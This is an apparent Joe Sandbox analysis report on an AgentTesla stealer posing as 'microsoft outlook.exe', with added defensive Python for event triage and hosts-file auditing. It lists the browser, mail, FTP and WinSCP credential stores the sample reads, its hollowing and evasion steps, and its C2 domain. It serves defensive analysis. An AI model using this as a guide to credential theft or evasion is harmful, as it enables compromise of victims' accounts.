Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_00401E1D SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
(The IsDebuggerPresent/SetUnhandledExceptionFilter/UnhandledExceptionFilter sequences at 3_2_00401C88, 3_2_0040446F and 3_2_00401F30 match the MSVC CRT's __scrt_fastfail and __raise_securityfailure routines: compiler boilerplate rather than a purposeful anti-debugging check.)

HIPS / PFW / Operating System Protection Evasion:

Modifies the hosts file
Source: C:\Users\user\Desktop\microsoft outlook.exe | File written: C:\Windows\System32\drivers\etc\hosts
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\microsoft outlook.exe | Memory written: C:\Users\user\Desktop\microsoft outlook.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\microsoft outlook.exe | Process created: C:\Users\user\Desktop\microsoft outlook.exe "C:\Users\user\Desktop\microsoft outlook.exe"
(Taken together these two events are process hollowing: the sample starts a second copy of itself and writes a complete PE image, MZ header 4D5A first, at that copy's image base 0x400000. The Yara matches in the sections below show that the written image is the AgentTesla payload.)
Source: microsoft outlook.exe, 00000003.00000002.559696214.0000000000E80000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: microsoft outlook.exe, 00000003.00000002.559696214.0000000000E80000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: microsoft outlook.exe, 00000003.00000002.559696214.0000000000E80000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: microsoft outlook.exe, 00000003.00000002.559696214.0000000000E80000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
(Progman and Shell_TrayWnd are the window classes of the desktop and the taskbar; code that carries these names locates top-level shell windows, typically through FindWindow.)
Source: C:\Users\user\Desktop\microsoft outlook.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\microsoft outlook.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\microsoft outlook.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation (recorded 3 times)
Source: C:\Users\user\Desktop\microsoft outlook.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\microsoft outlook.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\microsoft outlook.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
(These are .NET Framework assemblies resolved from the GAC, so process 3 executes managed code; System.Management is the .NET wrapper around WMI and is the likely origin of the Win32_BaseBoard and Win32_Processor queries listed under evasion.)
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_0040208D cpuid
Source: C:\Users\user\Desktop\microsoft outlook.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid (a stable per-installation identifier that stealers commonly use as the victim ID in exfiltrated data)
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, (the MSVC CRT's stack-cookie initialisation, __security_init_cookie, not sample logic)
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, (directory setup in process 1; together with the nsXXXX.tmp drop directory this is characteristic of an NSIS installer stub)
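The evasion and injection signatures above are the kind of sandbox output an analyst ends up triaging by hand. The following Python is an added example, not part of the report and not Joe Sandbox code, that encodes those checks as rules over lines in the "Source: <process> | <event>" shape used on this page: WMI classes the report associates with VM fingerprinting, sleep loops past the report's threshold of 30, a single delay longer than five minutes (an assumed threshold), a hosts-file write, and the self-hollowing pattern, which needs two events correlated (a child created from the parent's own image plus a write beginning with 4D5A at that child's image base). The sample event lines are constructed by hand to mirror the ones above.

```python
import re

# Constructed sample lines in the "Source: <process> | <event>" shape used to present this
# report's behaviour signatures. They mirror lines on this page but were typed by hand for
# the example; neither they nor the rules below come from Joe Sandbox.
EXE = r"C:\Users\user\Desktop\microsoft outlook.exe"
SAMPLE_EVENTS = [
    f"Source: {EXE} | WMI Queries: IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_BaseBoard",
    f"Source: {EXE} | WMI Queries: IWbemServices::ExecQuery - root\\cimv2 : SELECT * FROM Win32_Processor",
    f"Source: {EXE} TID: 7000 | Thread sleep count: 7579 > 30",
    f"Source: {EXE} | Thread delayed: delay time: 922337203685477",
    f'Source: {EXE} | Process created: {EXE} "{EXE}"',
    f"Source: {EXE} | Memory written: {EXE} base: 400000 value starts with: 4D5A",
    f"Source: {EXE} | File written: C:\\Windows\\System32\\drivers\\etc\\hosts",
    f"Source: {EXE} | Process information set: NOOPENFILEERRORBOX",   # benign noise
]

# WMI classes the report's own signatures treat as VM fingerprinting.
VM_WMI_CLASSES = {"Win32_BaseBoard", "Win32_Bios", "Win32_NetworkAdapter",
                  "Win32_NetworkAdapterConfiguration", "Win32_Processor"}
SLEEP_COUNT_LIMIT = 30            # the threshold the report itself applies
DELAY_MS_LIMIT = 5 * 60 * 1000    # assumption: one delay over five minutes is a stall

LINE_RE = re.compile(r"^Source: (?P<src>.+?)(?: TID: (?P<tid>\d+))? \| (?P<event>.+)$")
WMI_RE = re.compile(r"WMI Queries: .*?(Win32_\w+)")
SLEEP_COUNT_RE = re.compile(r"Thread sleep count: (\d+)")
DELAY_RE = re.compile(r"Thread delayed: delay time: (\d+)")
PROC_CREATED_RE = re.compile(r'Process created: (.+?) "')
MEM_WRITTEN_RE = re.compile(r"Memory written: (.+?) base: ([0-9A-Fa-f]+) value starts with: 4D5A")
HOSTS_RE = re.compile(r"File written: .*\\drivers\\etc\\hosts$", re.IGNORECASE)


def parse(line):
    """Split one line into source process, optional thread id and event text."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def triage(lines):
    """Return (rule, source, evidence) tuples. Single-event rules fire as lines are read;
    the injection rule needs two events and is evaluated after the pass."""
    findings = []
    spawned = set()      # (parent, child image) pairs
    mz_written = set()   # (writer, target image, base) writes that begin with an MZ header
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        src, event = ev["src"], ev["event"]
        if (m := WMI_RE.search(event)) and m.group(1) in VM_WMI_CLASSES:
            findings.append(("vm_fingerprint_wmi", src, m.group(1)))
        elif (m := SLEEP_COUNT_RE.search(event)) and int(m.group(1)) > SLEEP_COUNT_LIMIT:
            findings.append(("evasive_sleep_loop", src, int(m.group(1))))
        elif (m := DELAY_RE.search(event)) and int(m.group(1)) >= DELAY_MS_LIMIT:
            findings.append(("evasive_long_delay", src, int(m.group(1))))
        elif (m := PROC_CREATED_RE.search(event)):
            spawned.add((src, m.group(1)))
        elif (m := MEM_WRITTEN_RE.search(event)):
            mz_written.add((src, m.group(1), m.group(2)))
        elif HOSTS_RE.search(event):
            findings.append(("hosts_file_tamper", src, event.split(": ", 1)[1]))
    # An MZ-headed write is conclusive only when the target is a process the writer spawned.
    for src, target, base in sorted(mz_written):
        if (src, target) in spawned:
            rule = "self_hollowing" if target.lower() == src.lower() else "pe_injection"
            findings.append((rule, src, f"{target} @0x{base}"))
    return findings


if __name__ == "__main__":
    for rule, src, evidence in triage(SAMPLE_EVENTS):
        print(f"{rule:20} {evidence}")
```

Run it as a script to print the findings, or replace SAMPLE_EVENTS with exported lines. The correlation step is what a single-line grep misses: an MZ-headed write into another process only becomes conclusive once it is tied to a child the writer itself just spawned.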

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies the hosts file
Source: C:\Users\user\Desktop\microsoft outlook.exe | File written: C:\Windows\System32\drivers\etc\hosts (the hosts file is consulted before DNS, so entries that map security-vendor or update hostnames to 127.0.0.1 or 0.0.0.0 silently cut the host off from those services; compare the file against a known-good copy during response)
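When a host in your environment shows this signature, the first response step is to read the hosts file and separate sinkholing entries from redirections. The Python below is an added example, not from the report and not Joe Sandbox code, that parses a hosts file and classifies every active mapping. The file content is constructed for the example under the reserved .test domain, because the report records only that the file was written, not what was written.

```python
import ipaddress

# Constructed hosts-file content. The report records only that the sample wrote to
# C:\Windows\System32\drivers\etc\hosts, not the entries it added; the names below are
# placeholders under the reserved .test TLD.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#    127.0.0.1       localhost
#    ::1             localhost
127.0.0.1 localhost
127.0.0.1 example-av-vendor.test
0.0.0.0   updates.example-security.test   # sinkholed: the vendor can no longer be reached
198.51.100.7 login.example-bank.test      # hijacked: traffic goes to an attacker host
"""

# Names a stock hosts file may legitimately map to loopback.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}


def parse_hosts(text):
    """Return (line_no, ip, hostname) for every active mapping, ignoring comments and blanks."""
    rows = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()     # drop trailing comments
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                            # not a hosts mapping at all
        for name in fields[1:]:
            rows.append((n, ip, name.lower()))
    return rows


def audit_hosts(text):
    """Classify every non-local mapping as 'blocked' (name sent to loopback or the
    unspecified address, which is how a hosts-file edit cuts a host off from AV and
    update servers) or 'redirected' (name pointed at some other address)."""
    findings = []
    for n, ip, name in parse_hosts(text):
        if name in LOCAL_NAMES:
            continue
        verdict = "blocked" if (ip.is_loopback or ip.is_unspecified) else "redirected"
        findings.append((verdict, name, str(ip), n))
    return findings


if __name__ == "__main__":
    for verdict, name, ip, n in audit_hosts(SAMPLE_HOSTS):
        print(f"line {n}: {verdict:10} {name} -> {ip}")
```

On a live Windows host, replace SAMPLE_HOSTS with the contents of C:\Windows\System32\drivers\etc\hosts (for example via pathlib's read_text). A stock Windows hosts file contains only comments, so every active line the script reports was added after installation and deserves a look.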

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File sources of type UNPACKEDPE:
  3.0.microsoft outlook.exe.415058.12.unpack
  3.0.microsoft outlook.exe.400000.7.unpack
  3.2.microsoft outlook.exe.4950000.4.raw.unpack
  3.0.microsoft outlook.exe.400000.9.unpack
  3.2.microsoft outlook.exe.4e64c8.2.raw.unpack
  3.0.microsoft outlook.exe.400000.2.unpack
  3.2.microsoft outlook.exe.415058.0.unpack
  3.0.microsoft outlook.exe.400000.6.unpack
  3.0.microsoft outlook.exe.415058.12.raw.unpack
  3.2.microsoft outlook.exe.4e64c8.2.unpack
  3.0.microsoft outlook.exe.400000.11.unpack
  3.2.microsoft outlook.exe.3515530.3.unpack
  3.0.microsoft outlook.exe.400000.0.unpack
  1.2.microsoft outlook.exe.2441458.1.unpack
  1.2.microsoft outlook.exe.2441458.1.raw.unpack
  3.2.microsoft outlook.exe.415058.0.raw.unpack
  1.2.microsoft outlook.exe.2430000.2.unpack
  3.0.microsoft outlook.exe.400000.4.unpack
  3.2.microsoft outlook.exe.400000.1.unpack
  3.2.microsoft outlook.exe.3515530.3.raw.unpack
  1.2.microsoft outlook.exe.2430000.2.raw.unpack
  3.1.microsoft outlook.exe.415058.1.unpack
  3.1.microsoft outlook.exe.415058.1.raw.unpack
  3.0.microsoft outlook.exe.400000.1.unpack
  3.1.microsoft outlook.exe.400000.0.unpack
  3.0.microsoft outlook.exe.400000.3.unpack
  3.0.microsoft outlook.exe.400000.5.unpack
  3.2.microsoft outlook.exe.4950000.4.unpack
  3.0.microsoft outlook.exe.415058.10.raw.unpack
  3.0.microsoft outlook.exe.415058.10.unpack
  3.2.microsoft outlook.exe.400000.1.raw.unpack
  3.2.microsoft outlook.exe.49a0000.5.unpack
  3.0.microsoft outlook.exe.400000.8.unpack
Source: Yara match | File sources of type MEMORY:
  00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmp
  00000001.00000002.300252799.0000000002430000.00000004.00000001.sdmp
  00000003.00000002.561417373.00000000049A2000.00000040.00000001.sdmp
  00000003.00000002.561213079.0000000003511000.00000004.00000001.sdmp
  00000003.00000000.298689668.0000000000414000.00000040.00000001.sdmp
  00000003.00000001.299532186.0000000000414000.00000040.00020000.sdmp
  00000003.00000002.561338501.0000000004950000.00000004.00020000.sdmp
  00000003.00000002.558241910.00000000004CA000.00000004.00000020.sdmp
  00000003.00000002.557953046.0000000000400000.00000040.00000001.sdmp
  00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp
Source: Yara match | File source: Process Memory Space: microsoft outlook.exe PID: 1752, type: MEMORYSTR
(The payload matches in both process 1, in heap regions at 0x2430000 and 0x2441458, and process 3, at its image base 0x400000: consistent with the parent unpacking AgentTesla in its own memory and then writing it into the child, as recorded under process injection above.)
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\microsoft outlook.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (recorded twice)
Source: C:\Users\user\Desktop\microsoft outlook.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (the Outlook profile subkey that holds account settings, including stored passwords)
Source: C:\Users\user\Desktop\microsoft outlook.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\microsoft outlook.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\microsoft outlook.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\Desktop\microsoft outlook.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\microsoft outlook.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\microsoft outlook.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: microsoft outlook.exe PID: 1752, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match | the same unpacked PE regions and memory dumps listed under Stealing of Sensitive Information above (the report lists this signature under both categories)

Mitre Att&ck Matrix

The matrix is listed per tactic below. A trailing bracketed number is the hit badge the matrix attaches to a technique matched by this report's signatures; techniques without one are the unmatched fillers of the matrix layout.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation [211]; Native API [11]; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection [112]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: File and Directory Permissions Modification [1]; Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [1]; Software Packing [1]; Virtualization/Sandbox Evasion [131]; Process Injection [112]; Indicator Removal from Tools
Credential Access: OS Credential Dumping [2]; Credentials in Registry [1]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery [1]; File and Directory Discovery [2]; System Information Discovery [127]; Security Software Discovery [231]; Process Discovery [2]; Virtualization/Sandbox Evasion [131]; Application Window Discovery [1]; Remote System Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Archive Collected Data [11]; Data from Local System [2]; Email Collection [1]; Clipboard Data [1]; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel [1]; Non-Application Layer Protocol [1]; Application Layer Protocol [1]; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: System Shutdown/Reboot [1]; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

Behavior Graph

(The interactive graph is not reproduced in this text. Its legend distinguishes process, signature, created-file and DNS/IP nodes; marks dropped files, Windows processes, malicious nodes and Internet endpoints; annotates nodes with the number of created registry values and files; and labels each process by language: Visual Basic, Delphi, Java, .NET C# or VB.NET, or C, C++ or other.)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source: microsoft outlook.exe | Detection: 56% | Scanner: Virustotal
Source: microsoft outlook.exe | Detection: 12% | Scanner: Metadefender
Source: microsoft outlook.exe | Detection: 100% | Scanner: Avira | Label: HEUR/AGEN.1211150

Dropped Files

Source: C:\Users\user\AppData\Local\Temp\nsm4A2D.tmp\wbyrs.dll | Detection: 100% | Scanner: Avira | Label: TR/Injector.wiefs
Source: C:\Users\user\AppData\Local\Temp\nsm4A2D.tmp\wbyrs.dll | Detection: 18% | Scanner: Metadefender
Source: C:\Users\user\AppData\Local\Temp\nsm4A2D.tmp\wbyrs.dll | Detection: 81% | Scanner: ReversingLabs | Label: Win32.Trojan.LokiBot

The Virustotal, Metadefender and ReversingLabs percentages are the share of engines that flagged the file at analysis time; Avira's 100% is a single engine's positive verdict rather than a ratio. Vendor family names are heuristic and frequently disagree: ReversingLabs labels the dropped DLL LokiBot, while the Yara rules and the extracted configuration in this report identify AgentTesla. Treat the Yara and configuration matches as the stronger attribution.

                      Unpacked PE Files

Source | Detection | Scanner | Label
3.0.microsoft outlook.exe.400000.11.unpack | 100% | Avira | TR/Spy.Gen8
3.0.microsoft outlook.exe.400000.9.unpack | 100% | Avira | TR/Spy.Gen8
3.0.microsoft outlook.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8
3.0.microsoft outlook.exe.400000.7.unpack | 100% | Avira | TR/Spy.Gen8
3.2.microsoft outlook.exe.400000.1.unpack | 100% | Avira | TR/Spy.Gen8
3.0.microsoft outlook.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
3.1.microsoft outlook.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
3.0.microsoft outlook.exe.400000.5.unpack | 100% | Avira | TR/Spy.Gen8
3.0.microsoft outlook.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8
3.2.microsoft outlook.exe.49a0000.5.unpack | 100% | Avira | TR/Spy.Gen8

                      Domains

Source | Detection | Scanner | Label
cgyasc.com | 0% | Virustotal

                      URLs

Source | Detection | Scanner | Label
http://mail.cgyasc.com | 0% | Avira URL Cloud | safe
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://YcxkAh.com | 0% | Avira URL Cloud | safe
http://cgyasc.com | 0% | Virustotal
http://cgyasc.com | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://d8P2A6TrVo.net | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
cgyasc.com | 192.185.25.212 | true | true | | unknown
mail.cgyasc.com | unknown | unknown | true | | unknown

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://mail.cgyasc.com | microsoft outlook.exe, 00000003.00000002.560904754.0000000002863000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.560924455.0000000002868000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://127.0.0.1:HTTP/1.1 | microsoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://DynDns.comDynDNS | microsoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://YcxkAh.com | microsoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_Error | microsoft outlook.exe | false | | high
http://nsis.sf.net/NSIS_ErrorError | microsoft outlook.exe | false | | high
http://cgyasc.com | microsoft outlook.exe, 00000003.00000002.560904754.0000000002863000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.560924455.0000000002868000.00000004.00000001.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | microsoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://d8P2A6TrVo.net | microsoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.560924455.0000000002868000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000003.505431063.00000000005E4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | microsoft outlook.exe, microsoft outlook.exe, 00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.561213079.0000000003511000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.561417373.00000000049A2000.00000040.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.561338501.0000000004950000.00000004.00020000.sdmp, microsoft outlook.exe, 00000003.00000002.557953046.0000000000400000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown

                            Contacted IPs


                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.185.25.212 | cgyasc.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true

                            General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 553252
Start date: 14.01.2022
Start time: 15:06:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 25s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: microsoft outlook.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.winEXE@3/3@2/1
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 15.9% (good quality ratio 15%)
• Quality average: 79.1%
• Quality standard deviation: 29%
HCA Information:
• Successful, ratio: 81%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 13.107.42.16, 13.107.5.88
• Excluded domains from analysis (whitelisted): ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, ctldl.windowsupdate.com, e-0009.e-msedge.net, arc.msn.com, ris.api.iris.microsoft.com, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, config.edge.skype.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

Time | Type | Description
15:07:29 | API Interceptor | 826x Sleep call for process: microsoft outlook.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

                            No context

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

C:\Users\user\AppData\Local\Temp\175uaz481uk7obsbd
Process: C:\Users\user\Desktop\microsoft outlook.exe
File Type: data
Category: dropped
Size (bytes): 292863
Entropy (8bit): 7.964166828002916
Encrypted: false
SSDEEP: 6144:GZ44xksym1P6Xox+NPJmDAf1I9DzpFJnwsxQ7yJ9LhJwW:I4Z0c0+NW8ePpEsWmTx
MD5: 6AD96963357FB04487B380570DAEEEAD
SHA1: 7D809672FCF38815F48571D52CB3A7274BAA30E1
SHA-256: EF2509C21473CD39E1F926BE410596372F430E7BF402ACC7C41853708491FA1D
SHA-512: EE99C059C070ED426B47580A53180EEC6FC40A29EE2480FD1AC67D8EEFFAD48BA186C7FB5057387D9E88BDF84C1F53A693A96E31C16F3F99D01C4AA34066972B
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Temp\nsm4A2D.tmp\wbyrs.dll
Process: C:\Users\user\Desktop\microsoft outlook.exe
File Type: PE32 executable (DLL) (native) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 179712
Entropy (8bit): 5.887634079868767
Encrypted: false
SSDEEP: 3072:Pjv/DLvAkNjGyy0M+zFsrOhH/7rsYVI6yzVwU2gcw8BZDptiwJn6RUJ7h+:PjfvAkFGy7gEf/ItWLpwsptiC6WJ7h+
MD5: 913E09CBE93268D0D02BC82C1A15D2C6
SHA1: E2B5BDB8425450C42F358BB65EED76BBB9D494E3
SHA-256: A15F8C268F7DFBD6B2C0AEA83C52A7D5530C4CD8A10D2D1BF1F7BED97807E3C3
SHA-512: 7D1B3DD83F603C1CCD6455EE4160D5C83EB25682D8BF509C59132E6BD8D21AB86572217258B25CA836FC818B0AA9EB91E694D19744003D7D9425D8340D9F6BA0
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Metadefender, Detection: 18%
• Antivirus: ReversingLabs, Detection: 81%
Reputation: low
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........O..AO..AO..A<.@@..AO..Aj..A...@N..A...@N..A..JAN..A...@N..ARichO..A................PE..L....g.a...........!......... .......................................................U....@....................................................................X....................................................................................text.............................. ..`.rdata..............................@..@.data...............................@....rsrc...............................@..B.reloc..X...........................@..B................................................................................................................................................................................................................................................................................................................................................
C:\Windows\System32\drivers\etc\hosts
Process: C:\Users\user\Desktop\microsoft outlook.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 835
Entropy (8bit): 4.694294591169137
Encrypted: false
SSDEEP: 24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
MD5: 6EB47C1CF858E25486E42440074917F2
SHA1: 6A63F93A95E1AE831C393A97158C526A4FA0FAAE
SHA-256: 9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
SHA-512: 08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
Malicious: true
Reputation: moderate, very likely benign file
